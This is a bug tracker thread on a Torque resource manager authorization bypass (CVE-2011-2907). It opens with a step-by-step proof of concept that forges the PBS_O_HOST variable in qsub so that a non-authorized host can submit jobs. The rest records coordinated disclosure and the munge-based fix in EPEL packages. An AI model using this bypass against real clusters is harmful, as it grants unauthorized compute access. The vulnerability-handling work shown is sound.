User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C) This Vulnerability was found not by the submitter of the bug but by Bartlomiej Balcerek.pl (Bartlomiej.Balcerek.pl) Torque, at least recent version (3.0.1) and GLite versions (e.g. 2.3.13,2.4.12) are vulnerable to authorization bypass attack. Torque's server, during authorization relies on data provided by "qsub" client. Qsub provides submit host name to server (hidden way), which is used by server to authenticate request. Using subverted PBS_O_HOST parameter it is possible to omit at least three (of four) authorization mechanisms Torque uses: 1) RCmd, using ruserok() function, 2) "submit_hosts" server parameter, 3) "allow_node_submit" server parameter As for the 4th mechanism: ACL ("acl_host_enable" option) it is proof against such authorization bypass. The "orighost" is taken from settable on client side variable pbs_o_host: "src/lib/Libsite/site_check_u.c": orighost = get_variable(pjob, pbs_o_host); Then three checks are performed to authorize submit host. All refer "orighost" variable. 1) "src/lib/Libsite/site_check_u.c": rc = ruserok(orighost, 0, owner, luser); if (rc != 0 && EMsg != NULL) { ... snprintf(EMsg, 1024, "ruserok failed validating %s/%s from %s", owner, luser, orighost); 2) "src/lib/Libsite/site_check_u.c": for (hostnum = 0;hostnum < submithosts->as_usedptr;hostnum++) { testhost = submithosts->as_string[hostnum]; if (!strcasecmp(testhost, orighost)) { /* job submitted from host found in trusted submit host list, access allowed */ 3) "src/lib/Libsite/site_check_u.c": if ((HostAllowed == 0) && (server.sv_attr[SRV_ATR_AllowNodeSubmit].at_flags & ATR_VFLAG_SET) && (server.sv_attr[SRV_ATR_AllowNodeSubmit].at_val.at_long == 1) && (find_nodebyname(orighost) != NULL)) { /* job submitted from compute host, access allowed */ Proof if concept: 1. Pick the site you want to check against vulnerability, check if its port 15001 is open to you, 2. Check its Torque version , 3. Choose a machine, that is not authorized to submit jobs, you must have root access to this machine, 4. Pick an appropriate Torque version from http://www.clusterresources.com/downloads/torque/ You can choose v. 2.3.6 to perform check against Torque server <= 2.4.12 5. Apply the attached patch e.g.: patch -p1 < torque-2.3.6-customargs.patch 6. Configure and make e.g..: ./configure --with-server-home=/opt/Torque-2.3.6/spool --prefix=/opt/Torque-2.3.6 --disable-server --disable-mom make make install (from root account) 7. Guess/choose any remote account name, 8. Create an account of such name on your local machine, and perform next task using this account, 9. Try to submit a job in regular way e.g.: echo /bin/sleep 100 | /opt/Torque-2.3.6/bin/qsub -q @<site address> At the end of the output you should see that your job was rejected: qsub: Bad UID for job execution MSG=ruserok failed validating bartol/bartol from sec.wcss.wroc.pl 10. Check PBS_O_HOST variable on "Variable_List" in qsub output. It should be changed to addres of valid "submit host". Server name itself is good idea there. 11. Submit a job with changed PBS_O_HOST on variable list e.g.: echo /bin/sleep 100 | /opt/Torque-2.3.6/bin/qsub -q @batch.wcss.wroc.pl -Z "Variable_List=PBS_O_HOME=/hom e/bartol,PBS_O_LANG=pl_PL.utf8,PBS_O_LOGNAME=bartol,PBS_O_PATH=/usr/lib64/qt-3.3/bin:/usr/NX/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/sbin:/usr/sbin:/sbin:/home/bartol/bin,PBS_O_MAIL=/var/spool/mail/bartol,PBS_O_SHELL=/bin/bash,PBS_SERVER=sec.wcss.wroc.pl,PBS_O_HOST=batch.wcss.wroc.pl,PBS_O_WORKDIR=/home/bartol" The submission should succeed now. Reproducible: Always This bug has already been reported to the Torque providers and the EGI Software Vulnerability Group (SVG) The EGI http://www.egi.eu/ Software Vulnerability group http://www.egi.eu/policy/groups/Software_Vulnerability_Group_SVG.html runs a process for handling software vulnerabilities reported. While our work is primarily designed to handle vulnerabilities in Grid Middleware, other vulnerabilities found in software used in the EGI infrastructure may also be reported to us and we pass the information on to the software suppliers, as well as considering the risk to the EGI infrastructure.
Hi, Linda. Thanks for this report. Has upstream responded back to your notification? Any ETA on when a fix might be delivered or when this might be made public?
Hi Vincent, I've not heard anything. Some members of the SVG are currently working on advice to mitigate the problem on EGI sites. I'll forward any information when I hear. (Sorry, not used to gmail, and keep forgetting to check it!) Linda
So upstream hasn't responded to this at all? Please keep us advised of this. Thanks!
I have some comments now from upstream, nothing concluded yet. Good news is that of course F15 and 16 and not vulnerable since they are compiled with munge[1] support. Switching munge on mid OS release is hardly a backwards compatible change for EPEL6. For EPEL4 and 5, and Fedora14 versions are currently to old to even have munge support. This is however an option to update and add munge. [*] http://code.google.com/p/munge/
So I poked at the code in EPEL 5 (2.3.13) and it is indeed affected by this. I don't know what the EPEL rules are regarding new packages and updating existing packages to compile against different things. I believe EPEL tries to follow RHEL-style rules when it comes to updates, so I don't know if adding munge support to those is feasible. Does this go away when munge support is enabled? I.e. there is no need fot the server to obtain this orighost variable from the client as described (munge obsoletes this code perhaps)? I'm afraid I don't fully understand how munge support makes this not vulnerable. Any further word from upstream regarding this? Perhaps in such a way that those installs that are not compiled with munge and/or don't have munge available, can be protected?
Hi Vincent, Switching to munge support does avoid this bit of code completly basically as I understand it, at the very least it restricts access to nodes where the shared secret is present. I think in reality the upgrade of torque itself is probably okay. Switching on munge will cause an imediate failiure untill a key is generated with munge-keygen and the resulting key be copied to each node with in the cluster. These problems can be mitigated against to a certain extent with release notes advising the pre-instalation of munge and key set up before torque is upgraded. Many epel torque users are screaming out for the upgrade and have left the epel version some time ago. I did have word from upstream that given munge exist as a solution they are not going to do anything, they are also working on something new authentication wise for torque 4. Upstream is now in CC. Munge it is then. Oh and thanks digger deaper. Steve.
Adaptive Computing is investigating new ways to to user authorization on the server and authorization between the server and MOM nodes. As soon as we know what method we want to use we will update you on what it is and in which versions it will be available. Regards Ken Nielson Adaptive Computing
I'm assuming that Ken is upstream here? Ken, will switching to munge solve the problem with our packages? If so, and if that is the best/cleanest way to move forward, then I would say we should do so.
Vencent, I am upstream. I would suggest switching to munge for those who can. Ken Nielson Adaptive Computing
Ken, thank you for that. Steve, I fully support getting munge into EPEL then and building torque against it. I do not, however, think we should mention the authentication bypass since I do not believe this is public information (am I correct in that regard, Ken)? While munge support will make that problem go away, it doesn't _fix_ the problem. Ken, do you have plans to correct the problem and make this information public? This would affect more than just us, regarding people that do not have munge available or having torque built against it. We would like to make this bug and the information public at some point, but definitely want to respect your timeframe and solutions. I also suspect that Linda would appreciate knowing when this would be public as well. We can assist with assigning a CVE name to this flaw, and if we can help in other ways to facilitate this (perhaps advising other vendors when a suitable patch/solution is prepared), we would like to. Please advise.
Vincent, Thank you for your consideration. Our plans are still internal and we have not made a proposal to the community yet. We would like to have a solution available by September or October. We will be discussing it with the community before that but it would be nice if they hear it directly from us first. Regards Ken Nielson Adaptive Computing
Yikes, that's quite a ways away. Ok, please just let us know when this is public. For the time being, we would like to get the munge support into Fedora and build our packages against munge, which has the added benefit of preventing this flaw. We will make this available as a bug fix or enhancement update (rebase to new version, new functionality, etc. that some people are asking for). It feels a wee bit sneaky, but we will abide by your wishes for disclosure and still get a preemptive fix out. Steve, does this work for you? If it does, please do not note this bug # or any security implications in the update. Thanks.
ACK, I'll get an update out in the next couple of days at least to testing before I run away for summer break, that's EL4, 5 and 6 and possibly and old fedora. Steve.
Perfect. Thanks Steve.
Okay builds for EPEL 6, 5 and 4 respectively. http://koji.fedoraproject.org/koji/buildinfo?buildID=255469 http://koji.fedoraproject.org/koji/buildinfo?buildID=255610 and http://koji.fedoraproject.org/koji/buildinfo?buildID=255615 6 is fairly small jump. 4 and 5 jump from 2.3.13 to 2.5.7 from memory there are no incompatibilities between these two version in particular for the job database in particular which is what matters. Maybe Ken you know of something big between these versions, of course the fact that munge is now enabled is significant and I am aware of. Testing time..... Steve.
The only thing users need to be aware of when upgrading to 2.5.7 from 2.4.x and earlier is that job arrays are not backwardly compatible. To get around this problem administrators need to make sure that any jobs which have been submitted as job arrays are complete before making an upgrade. For more information see the Release_Notes from the tar ball. Let me know if you need more information. Ken
https://admin.fedoraproject.org/updates/torque-2.5.7-1.el6 https://admin.fedoraproject.org/updates/torque-2.5.7-1.el5 https://admin.fedoraproject.org/updates/torque-2.5.7-1.el4 have been pushed to testing and now contain release notes. Testing time... has yet to start yet really so I have disable push on karma for now.
Is it OK if I copy and paste the formula to reproduce this security hole. We are discussing it with the community right now and they want to know the nature of the problem. Ken Nielson Adaptive Computing
(In reply to comment #18) > are discussing it with the community right now and they want to know the nature > of the problem. > http://www.clusterresources.com/pipermail/torqueusers/2011-August/013184.html This is basically public I would say, almost, the thread wanders around it but lots of people actually know.
Steve, Thanks. I just wanted to make sure I was no stepping on any toes. Ken
Hi Ken, I should have said, you should probably wait for comment from Vincent since with public he will probably fill in a CVE. Steve.
New packages in testing for EPEL4 and 5. https://admin.fedoraproject.org/updates/torque-2.5.7-1.el4.1 https://admin.fedoraproject.org/updates/torque-2.5.7-1.el5.1 the previous ones had a packaging bug, Bug #716659 Steve.
What we should do is assign a CVE to this now, and if you want to discuss this in public, we should also make this bug public. The information on the mailing list is suitably vague, so I don't think MITRE would have picked up on it yet, so we can get the CVE assigned easily. I'm going to change this to an SRT bug and assign a CVE. Ken, let me know if making this bug public works for you; I think if you're going to discuss it and provide details, there is no point in keeping this bug private.
Ok, the name CVE-2011-2907 is assigned to this flaw. If you discuss it further on the mailing list, can you note the CVE name? Also, I would like to make this bug public since the discussion is public and the details are semi-public. I see no real value in keeping this bug private. Thanks! Steve, I changed this to an SRT bug. If you do require some Fedora/EPEL bugs to make things go through the system, please let me know and I'll create them once this bug is public.
Oh, just went through the thread a bit more and found this: http://www.clusterresources.com/pipermail/torqueusers/2011-August/013194.html so it is public. Can someone please note the CVE name in that discussion? I'd also like to inform the oss-security mailing list.
Making this public.
Vincent, We have already gone public with the bug. The TORQUE community is not too concerned since they already have safeguards in place to prevent an exploit. Regards Ken
(In reply to comment #27) > We have already gone public with the bug. The TORQUE community is not too > concerned since they already have safeguards in place to prevent an exploit. That's what I thought. I notified oss-security as well, with the CVE name, so there is no confusion. Thanks Ken!
Hi Vincent, An SRT bug? Can I have epel4, 5 and 6 bugs then, my understanding is this becomes a parent to these. .... For me one bug would be enough that I can attach to the bodhi pages. Steve.
Created torque tracking bugs for this issue Affects: epel-all [bug 730119]
(In reply to comment #29) > An SRT bug? Can I have epel4, 5 and 6 bugs then, my understanding is > this becomes a parent to these. .... For me one bug would be enough > that I can attach to the bodhi pages. Done. See bug #730119. Thanks.
These updates have had this bug attached, they have not been added here automatically by bodhi I presume because they had already been pushed to testing. https://admin.fedoraproject.org/updates/torque-2.5.7-1.el4.1 https://admin.fedoraproject.org/updates/torque-2.5.7-1.el5.1 https://admin.fedoraproject.org/updates/torque-2.5.7-1.el6
There be another advisory here soon: https://wiki.egi.eu/wiki/SVG:Advisory-SVG-2011-2296